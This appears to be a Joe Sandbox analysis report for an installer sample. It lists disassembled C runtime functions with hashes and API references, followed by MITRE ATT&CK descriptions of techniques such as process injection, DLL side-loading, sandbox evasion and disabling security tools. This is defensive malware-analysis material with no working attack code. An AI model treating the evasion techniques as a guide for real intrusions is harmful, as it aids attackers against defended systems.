Opcode ID: 69f4445d097f98401d12acd51b8569898e6d1dd4d120742049a729f846a4dfca
Instruction ID: b2aff022ea3215435421a23c1dfd081016e10aa98abc710c952bb5980af44d68
Opcode Fuzzy Hash: 69f4445d097f98401d12acd51b8569898e6d1dd4d120742049a729f846a4dfca
Instruction Fuzzy Hash: 320152317007619BDB25ABAAD406B5BB3E8FF04725F00861EE056DB5C1DF7CE5048E60

Function 003E153B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 003E155A
std::exception::exception.LIBCMT ref: 003E157C

Strings

ios_base::badbit set, xrefs: 003E156E
ios_base::failbit set, xrefs: 003E15A4
ios_base::eofbit set, xrefs: 003E1578, 003E15B4

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: df8b3bdffc70d1e89fef81baa3403ff015637f6b224beb766178d500c18cbf3a
Instruction ID: 265e1df77062be7ac869ec538560b5c665653160e34bf74bb6dae234ddef13f9
Opcode Fuzzy Hash: df8b3bdffc70d1e89fef81baa3403ff015637f6b224beb766178d500c18cbf3a
Instruction Fuzzy Hash: 440192B180026CBACB07EFAB84067ED77E85B82714B148216E5179B2C2D674CA058F51

Function 003E7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 003E7D53

Part of subcall function 003E7CAE: ___BuildCatchObjectHelper.LIBCMT ref: 003E7CE4

_UnwindNestedFrames.LIBCMT ref: 003E7D6A
___FrameUnwindToState.LIBCMT ref: 003E7D78

Strings

csm, xrefs: 003E7D4F, 003E7D64, 003E7D77, 003E7D95, 003E7DA5
csm, xrefs: 003E7D42

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction ID: 8cf2768a95678ff5116fce6ab109e3d6b291c8eac65fb783929cd3afca15ca39
Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction Fuzzy Hash: FC01E4310051A9BBDF23AF52CC45EAB7F6AEF08350F104214BD19192A1D73299A1DBA1

Function 003EDDF8 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 003EDE06

Part of subcall function 003E729E: __FF_MSGBANNER.LIBCMT ref: 003E72B7
Part of subcall function 003E729E: __NMSG_WRITE.LIBCMT ref: 003E72BE
Part of subcall function 003E729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003E63C9,00000000,00000001,00000000,?,003EB6D2,00000018,003FD718,0000000C,003EB762), ref: 003E72E3

_free.LIBCMT ref: 003EDE19

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 81498024c0fe2090d591e1a89aaaf62592e241205547c758075cf785bcacabe9
Instruction ID: 01d65415e9d98dfb1a31fb29c1c35ffb2a9c51b19b79a0934e5a06ca9cee946c
Opcode Fuzzy Hash: 81498024c0fe2090d591e1a89aaaf62592e241205547c758075cf785bcacabe9
Instruction Fuzzy Hash: 34119832804975EACB233B76AC0C76A3B599BA4360F258726F4559F1D0DE309841D655

Function 003ED935 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003ED941

Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC

__getptd.LIBCMT ref: 003ED958
__amsg_exit.LIBCMT ref: 003ED966
__lock.LIBCMT ref: 003ED976
__updatetlocinfoEx_nolock.LIBCMT ref: 003ED98A

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 0c7e082d61dea8e8cacbe9456960bfd1be089fc65024c4245be223c75a27434b
Instruction ID: 7b675ec875f7f80aeca69b948d92cbeb63d8dd53949634670dd56bd7cbcecc93
Opcode Fuzzy Hash: 0c7e082d61dea8e8cacbe9456960bfd1be089fc65024c4245be223c75a27434b
Instruction Fuzzy Hash: B1F0B4329407B49FDB23BB6A9C0775E77A0AF00720F124319F554AF2C3CB3459009B56

Function 003E2610 Relevance: 6.2, APIs: 4, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b664f11c2f32082ffa33ec34508f7bee827204ba96a4beb225e4ce11275e3197
Instruction ID: 0e8881ecdfce5960f018cff0837e5c9bbffb1f82536f7d6dffbffe0ff07c0866
Opcode Fuzzy Hash: b664f11c2f32082ffa33ec34508f7bee827204ba96a4beb225e4ce11275e3197
Instruction Fuzzy Hash: 9E519F759006A99FCF16DFA9C9818AEB7FDFF08314B20066EE142A7691D770AE44CB10

Function 003E5513 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003E55AE
__flush.LIBCMT ref: 003E55CC
__write.LIBCMT ref: 003E55F3
__flsbuf.LIBCMT ref: 003E561E

Part of subcall function 003EA8EB: __getptd_noexit.LIBCMT ref: 003EA8EB

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: c58174079ed187f757af3dbd0f50497141cf6e9fe6a182bf34fc82d736e20487
Instruction ID: f304351dbbc9d6a1583bc1368d86843c5b6e4d9becffee03faae4da06665f487
Opcode Fuzzy Hash: c58174079ed187f757af3dbd0f50497141cf6e9fe6a182bf34fc82d736e20487
Instruction Fuzzy Hash: E841E531A00FA4DFDB269F6788446AEBBB6AF81328F258728E456975C0D770ED418B40

Function 003F3BE5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003F3C19
__isleadbyte_l.LIBCMT ref: 003F3C4C
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 003F3C7D
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 003F3CEB

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5e40312b848d2c960f316e409e44db522bf687c02bb69e432bbfc546be374c50
Instruction ID: 7fb5388e457e50f503b205b1db5b143668d7424d45c8cd7af4937c9086fd8b8d
Opcode Fuzzy Hash: 5e40312b848d2c960f316e409e44db522bf687c02bb69e432bbfc546be374c50
Instruction Fuzzy Hash: C331E531A0429EEFCB12DF64C884AB97BB5FF01310F168569E261EB1A1D730DE40DB51

Function 003E913A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 003E9160

Part of subcall function 003E8F8C: __fltout2.LIBCMT ref: 003E8FB7

__cftog_l.LIBCMT ref: 003E9186
__cftoe_l.LIBCMT ref: 003E91B8

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 16426bb2877b556cd2477befc53ce76b1b545b86f8e3dda862f239c3a7b6c417
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 80117E7640029ABBCF235F86CC05DEE3F26BB18390B598656FA1859071D736C9B1AB81

Function 003E448C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 003E44A6

Part of subcall function 003E729E: __FF_MSGBANNER.LIBCMT ref: 003E72B7
Part of subcall function 003E729E: __NMSG_WRITE.LIBCMT ref: 003E72BE
Part of subcall function 003E729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003E63C9,00000000,00000001,00000000,?,003EB6D2,00000018,003FD718,0000000C,003EB762), ref: 003E72E3

std::exception::exception.LIBCMT ref: 003E44DB
std::exception::exception.LIBCMT ref: 003E44F5
__CxxThrowException@8.LIBCMT ref: 003E4506

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 16842479139ee23ba6c2965f71b4b96c13108fe1459423af283d3db26ef8252c
Instruction ID: 3ad08dedd921cc779c90a6e46f121c2ef0fd1ead74360894ce1526b2be8ec4a0
Opcode Fuzzy Hash: 16842479139ee23ba6c2965f71b4b96c13108fe1459423af283d3db26ef8252c
Instruction Fuzzy Hash: 7EF0497160026A6ADB07EB57DD06BAD37A9AB45314F100225F904BA1D2CF709A408B40

Function 003E35AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 003E35CA

Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38C1
Part of subcall function 003E38AC: __CxxThrowException@8.LIBCMT ref: 003E38D6
Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38E7

Part of subcall function 003E225E: std::_Xinvalid_argument.LIBCPMT ref: 003E226F

_memmove.LIBCMT ref: 003E3625

Strings

invalid string position, xrefs: 003E35C5

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 76a79e7dcdcb6c67aaa48ce239ab34185813bf863195f74a807f9d0d05ca2332
Instruction ID: a1bcbf820e128e8ed1c19e7a31e50d23ed99ad60f0c50a46f5ba1fc4a29f9a59
Opcode Fuzzy Hash: 76a79e7dcdcb6c67aaa48ce239ab34185813bf863195f74a807f9d0d05ca2332
Instruction Fuzzy Hash: 7211AB313042B4EBDB2A9E2BCC85A66B3A9EB85710F100B1DF9568B3C1D7B1DF018795

Function 003E2140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 003E2156

Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38C1
Part of subcall function 003E38AC: __CxxThrowException@8.LIBCMT ref: 003E38D6
Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38E7

_memmove.LIBCMT ref: 003E218F

Strings

invalid string position, xrefs: 003E2151

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: bc58543f82b736532caebfbde76899cf9395f4fb3ae87d3babd8162dbce4cec3
Instruction ID: 8fadd307762f67a5b48d02d302d0c7f42bc93424b059eedb1e1b45322908fe83
Opcode Fuzzy Hash: bc58543f82b736532caebfbde76899cf9395f4fb3ae87d3babd8162dbce4cec3
Instruction Fuzzy Hash: 2B01B5313102A19BD7268E69DCC486BB3BEEBC57107204B3DE6818B785DB74EE4583A4

Function 003E67E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 003E67F4
__invoke_watson.LIBCMT ref: 003E6848

Part of subcall function 003E6683: _strcat_s.LIBCMT ref: 003E66A2

Strings

&k>, xrefs: 003E67EA, 003E67ED

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __invoke_watson_strcat_s_strcpy_s
String ID: &k>
API String ID: 312943863-2229881991
Opcode ID: e0e9071177e5dacf167cf5c7613768fb8065f4ca94015d21ba007a7314cc8a96
Instruction ID: ebda3a118a1a944a8c54f72002593fed1edb24d4800bd71b285aac12daa78933
Opcode Fuzzy Hash: e0e9071177e5dacf167cf5c7613768fb8065f4ca94015d21ba007a7314cc8a96
Instruction Fuzzy Hash: E2F0F6724003A87BDF136FA2CC07EEA3F5DAF20390F498021FA195A0A2E7329D10C790

Function 003E7AB9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003E4895: __getptd.LIBCMT ref: 003E489B
Part of subcall function 003E4895: __getptd.LIBCMT ref: 003E48AB

__getptd.LIBCMT ref: 003E7AC8

Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC

__getptd.LIBCMT ref: 003E7AD6

Strings

csm, xrefs: 003E7AE4

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction ID: 2eb6379593c76bdeb124238add9d2d20c4e8da45de7750226ff7c93dc00e51d2
Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction Fuzzy Hash: D10162398052E7CBCF369F23D44866DB3B5EF14311F254A6EE0459A6E1DB318984CB41

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
